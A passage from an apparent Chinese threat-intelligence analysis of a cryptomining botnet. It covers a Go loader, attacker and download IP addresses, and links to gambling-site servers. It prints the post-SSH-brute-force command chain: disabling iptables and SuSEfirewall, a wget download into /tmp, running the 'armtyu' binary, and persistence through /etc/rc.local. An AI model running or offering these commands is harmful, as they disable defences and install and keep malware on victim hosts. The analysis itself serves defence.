Loader 使用 Go 语言编写,大量的 Go 语言的库代码掩盖了真正的病毒代码部分,所以免杀效果较好。2155个 Go 语言库函数,真正的病毒代码包含在4个函数中。
六、溯源分析对这批挖矿样本进行溯源分析发现,从今年5月开始,发起攻击的 IP一共有两个:160.124.67.66、123.249.34.103
另外,样本下载地址:181.215.242.240、123.249.9.141、123.249.34.103、58.221.72.157、160.124.48.150
SSH 暴力破解成功后执行的命令有(suSEfirewall 的关闭、iptables 的关闭、样本的下载):
/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;cd /tmp;
wget -c ;
chmod 777 armtyu;./armtyu;
echo "cd /tmp/">>/etc/rc.local;
echo "./armtyu&">>/etc/rc.local;echo "/etc/init.d/iptables stop
扫描 IP 和下载 IP 信息表:
IP 地址 服务器地址 对外开放服务 其他描述181.215.242.240 美国 netbios ftp、垃圾邮件、僵尸网络
160.124.67.66 中国 香港 netbios mmhongcan168.com、28zuche.com、014o.com、ip28.net、扫描
160.124.48.150 中国 香港 netbios ip28.net、扫描
123.249.9.141 中国 贵州 僵尸网络
表格中 160.124.67.66 是扫描 IP,通过对 IP 信息的图谱聚类,发现香港的两台主机均为一个团伙控制的机器。 美国和贵州的机器是入侵得到的机器。
上面提到的扫描机器均为赌博网站的机器,曾经的域名 mmhongcan168、28zuche 等都是赌博网站。
28zuche:
另一台香港机器的域名为 himitate.com,也是赌博网站。
两台香港主机均为 ip28.net,都可以作为门罗币(xmr)的挖矿代理主机。
黑产江湖之黑吃黑:
有人的地方就有江湖,黑产作为互联网中的法外之地,弱肉强食也是这个不法之地的规则。有做大产业的黑产大佬,也有干一票就走的小团伙,黑吃黑几乎天天都在上演。
赌博网站和色情网站是黑吃黑中常常被吃的对象,经研究分析可知,众多赌博网站所在的服务器竟被用来做扫描,各赌博网站之间并没发现强关联性,做赌博的团伙同时做挖矿的跨界运营也不是很多,而且整个挖矿金额不高。挖矿团伙若是入侵了赌博网站,利用其作为病毒服务器传播挖矿病毒,这也不是不可能。
对于美国和贵州的两台下载机,根据 threatbook 的情报,这两台主机应该是肉鸡,如下图:
第二个扫描地址为:123.249.34.103
58.221.72.157 江苏 rat123.249.34.103 贵州 scan
mdb7.cn 美国 bot
地理位置:
扫描地址 123.249.34.103的实际地址为中国贵州黔西南布依族苗族自治州,相关的情报如下:
相关网站解析过的地址为:
f6ae.com
h88032.com
h88034.com
h88049.com
h5770.com
h88051.com
以上 URL 地址均为赌博网站:
其他的一些情报: